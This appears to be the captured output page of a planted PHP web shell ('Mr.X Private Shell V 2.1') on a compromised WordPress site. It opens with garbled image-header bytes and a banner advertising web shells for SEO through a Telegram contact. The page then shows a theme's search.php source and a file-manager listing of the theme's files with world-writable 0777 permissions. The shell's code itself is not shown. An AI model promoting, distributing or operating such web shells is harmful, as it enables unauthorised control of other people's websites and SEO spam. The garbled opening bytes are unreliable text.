����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php /** * The template for displaying search results pages * * @link https://developer.wordpress.org/themes/basics/template-hierarchy/#search-result * * @package WordPress * @subpackage Twenty_Seventeen * @since Twenty Seventeen 1.0 * @version 1.0 */ get_header(); ?> <div class="wrap"> <header class="page-header"> <?php if ( have_posts() ) : ?> <h1 class="page-title"> <?php /* translators: Search query. */ printf( __( 'Search Results for: %s', 'twentyseventeen' ), '<span>' . get_search_query() . '</span>' ); ?> </h1> <?php else : ?> <h1 class="page-title"><?php _e( 'Nothing Found', 'twentyseventeen' ); ?></h1> <?php endif; ?> </header><!-- .page-header --> <div id="primary" class="content-area"> <main id="main" class="site-main" role="main"> <?php if ( have_posts() ) : // Start the Loop. while ( have_posts() ) : the_post(); /** * Run the loop for the search to output the results. * If you want to overload this in a child theme then include a file * called content-search.php and that will be used instead. */ get_template_part( 'template-parts/post/content', 'excerpt' ); endwhile; // End the loop. the_posts_pagination( array( 'prev_text' => twentyseventeen_get_svg( array( 'icon' => 'arrow-left' ) ) . '<span class="screen-reader-text">' . __( 'Previous page', 'twentyseventeen' ) . '</span>', 'next_text' => '<span class="screen-reader-text">' . __( 'Next page', 'twentyseventeen' ) . '</span>' . twentyseventeen_get_svg( array( 'icon' => 'arrow-right' ) ), 'before_page_number' => '<span class="meta-nav screen-reader-text">' . __( 'Page', 'twentyseventeen' ) . ' </span>', ) ); else : ?> <p><?php _e( 'Sorry, but nothing matched your search terms. Please try again with some different keywords.', 'twentyseventeen' ); ?></p> <?php get_search_form(); endif; ?> </main><!-- #main --> </div><!-- #primary --> <?php get_sidebar(); ?> </div><!-- .wrap --> <?php get_footer();
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| assets | Folder | 0755 |
|
|
| inc | Folder | 0755 |
|
|
| template-parts | Folder | 0755 |
|
|
| 404.php | File | 926 B | 0777 |
|
| archive.php | File | 1.8 KB | 0777 |
|
| comments.php | File | 2.36 KB | 0777 |
|
| error_log | File | 25.56 KB | 0777 |
|
| footer.php | File | 1.31 KB | 0777 |
|
| front-page.php | File | 1.52 KB | 0777 |
|
| functions.php | File | 20.37 KB | 0777 |
|
| header.php | File | 1.83 KB | 0777 |
|
| index.php | File | 2.1 KB | 0777 |
|
| page.php | File | 1002 B | 0777 |
|
| readme.txt | File | 4.31 KB | 0777 |
|
| rtl.css | File | 9.42 KB | 0777 |
|
| screenshot.png | File | 355.31 KB | 0777 |
|
| search.php | File | 2.01 KB | 0777 |
|
| searchform.php | File | 984 B | 0777 |
|
| sidebar.php | File | 522 B | 0777 |
|
| single.php | File | 1.59 KB | 0777 |
|
| style.css | File | 82.02 KB | 0777 |
|